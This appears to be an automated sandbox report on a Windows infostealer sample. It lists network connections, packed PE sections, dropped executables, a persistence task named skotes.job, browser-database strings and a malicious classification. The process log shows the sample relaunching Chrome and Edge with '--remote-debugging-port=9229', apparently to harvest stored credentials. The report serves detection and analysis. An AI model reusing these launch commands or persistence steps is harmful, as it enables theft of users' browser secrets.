Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56500
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56501
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56502
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 56509 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56450 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56487 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 56476 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.147.12:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.16.158.90:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:56418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:56442 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: section name:
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .rsrc
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: skotes.exe.25.dr	Static PE information: section name:
Source: skotes.exe.25.dr	Static PE information: section name: .idata
Source: skotes.exe.25.dr	Static PE information: section name:
Source: bca166439f.exe.28.dr	Static PE information: section name:
Source: bca166439f.exe.28.dr	Static PE information: section name: .rsrc
Source: bca166439f.exe.28.dr	Static PE information: section name: .idata
Source: bca166439f.exe.28.dr	Static PE information: section name:

Source: C:\Users\user\DocumentsJDAFHCGIJE.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9FECC0	0_2_6C9FECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA5ECD0	0_2_6CA5ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADAC30	0_2_6CADAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC6C00	0_2_6CAC6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA0AC60	0_2_6CA0AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA04DB0	0_2_6CA04DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA96D90	0_2_6CA96D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8CDC0	0_2_6CB8CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB88D20	0_2_6CB88D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACED70	0_2_6CACED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2AD50	0_2_6CB2AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA86E90	0_2_6CA86E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA0AEC0	0_2_6CA0AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAA0EC0	0_2_6CAA0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE0E20	0_2_6CAE0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9EE70	0_2_6CA9EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB48FB0	0_2_6CB48FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA0EFB0	0_2_6CA0EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA00FE0	0_2_6CA00FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADEFF0	0_2_6CADEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB40F20	0_2_6CB40F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA06F10	0_2_6CA06F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC2F70	0_2_6CAC2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA6EF40	0_2_6CA6EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB068E0	0_2_6CB068E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEC8C0	0_2_6CAEC8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA50820	0_2_6CA50820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA8A820	0_2_6CA8A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD4840	0_2_6CAD4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA909A0	0_2_6CA909A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CABA9A0	0_2_6CABA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC09B0	0_2_6CAC09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB1C9E0	0_2_6CB1C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA349F0	0_2_6CA349F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA56900	0_2_6CA56900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA38960	0_2_6CA38960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA7EA80	0_2_6CA7EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB8A30	0_2_6CAB8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAAEA00	0_2_6CAAEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA7CA70	0_2_6CA7CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAA0BA0	0_2_6CAA0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB06BE0	0_2_6CB06BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEEBD0	0_2_6CAEEBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2A480	0_2_6CB2A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA464D0	0_2_6CA464D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9A4D0	0_2_6CA9A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA64420	0_2_6CA64420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA8A430	0_2_6CA8A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA18460	0_2_6CA18460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F45B0	0_2_6C9F45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACA5E0	0_2_6CACA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA8E5F0	0_2_6CA8E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA62560	0_2_6CA62560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAA0570	0_2_6CAA0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB48550	0_2_6CB48550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA58540	0_2_6CA58540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB04540	0_2_6CB04540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA5E6E0	0_2_6CA5E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9E6E0	0_2_6CA9E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA246D0	0_2_6CA246D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA5C650	0_2_6CA5C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA2A7D0	0_2_6CA2A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA80700	0_2_6CA80700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F8090	0_2_6C9F8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA100B0	0_2_6CA100B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADC0B0	0_2_6CADC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACC000	0_2_6CACC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC8010	0_2_6CAC8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA4E070	0_2_6CA4E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA001E0	0_2_6CA001E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA76130	0_2_6CA76130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE4130	0_2_6CAE4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA68140	0_2_6CA68140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD22A0	0_2_6CAD22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACE2B0	0_2_6CACE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB862C0	0_2_6CB862C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD8220	0_2_6CAD8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACA210	0_2_6CACA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA88260	0_2_6CA88260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA98250	0_2_6CA98250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA323A0	0_2_6CA323A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA5E3B0	0_2_6CA5E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA543E0	0_2_6CA543E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA72320	0_2_6CA72320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB42370	0_2_6CB42370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA02370	0_2_6CA02370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB1C360	0_2_6CB1C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA96370	0_2_6CA96370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA08340	0_2_6CA08340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9FC80	0_2_6CA9FC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC1CE0	0_2_6CAC1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3DCD0	0_2_6CB3DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA11C30	0_2_6CA11C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA03C40	0_2_6CA03C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB29C40	0_2_6CB29C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F3D80	0_2_6C9F3D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB49D90	0_2_6CB49D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD1DC0	0_2_6CAD1DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA63D00	0_2_6CA63D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA23EC0	0_2_6CA23EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0DE10	0_2_6CB0DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5BE70	0_2_6CB5BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB85E60	0_2_6CB85E60
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_003FE530	28_2_003FE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_00437049	28_2_00437049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_00438860	28_2_00438860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_004378BB	28_2_004378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_00432D10	28_2_00432D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_003F4DE0	28_2_003F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_004331A8	28_2_004331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_003F4B30	28_2_003F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_00427F36	28_2_00427F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_0043779B	28_2_0043779B

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA29B10 appears 72 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB8D930 appears 45 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB39F30 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB8DAE0 appears 56 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB809D0 appears 253 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA23620 appears 63 times

Source: bca166439f.exe.28.dr	Static PE information: No import functions for PE file found
Source: random[1].exe.0.dr	Static PE information: No import functions for PE file found

Source: bca166439f.exe.28.dr	Static PE information: Data appended to the last section found
Source: random[1].exe.0.dr	Static PE information: Data appended to the last section found

Source: file.exe, 00000000.00000002.2687486247.0000000023413000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2687486247.0000000023413000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2692227656.000000006FD72000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: qttzyszk ZLIB complexity 0.9946879865435944
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9977115974114441
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: Section: sxkyywio ZLIB complexity 0.9946766634558387
Source: skotes.exe.25.dr	Static PE information: Section: ZLIB complexity 0.9977115974114441
Source: skotes.exe.25.dr	Static PE information: Section: sxkyywio ZLIB complexity 0.9946766634558387

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@75/291@27/28

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA60300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6CA60300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\RVJU28Y1.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9012:120:WilError_03

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\b6a09b47-8aae-4b4e-8381-225f2038a228.tmp

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2680904258.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691463626.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2680904258.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691463626.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2680904258.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691463626.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2680904258.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691463626.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2680904258.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691463626.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2680904258.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691463626.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2680904258.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691463626.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2438314905.000000001D17D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2346993132.000000001D189000.00000004.00000020.00020000.00000000.sdmp, JJEGCBGIDHCAKEBGIIDB.0.dr, FCAAEHJDBKJJKFHJEBKF.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2680904258.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691463626.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2680904258.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691463626.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 39%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: DocumentsJDAFHCGIJE.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2196,i,8775659685558455544,10122295161962970873,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2012,i,9669449525995071965,9129735360253068169,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
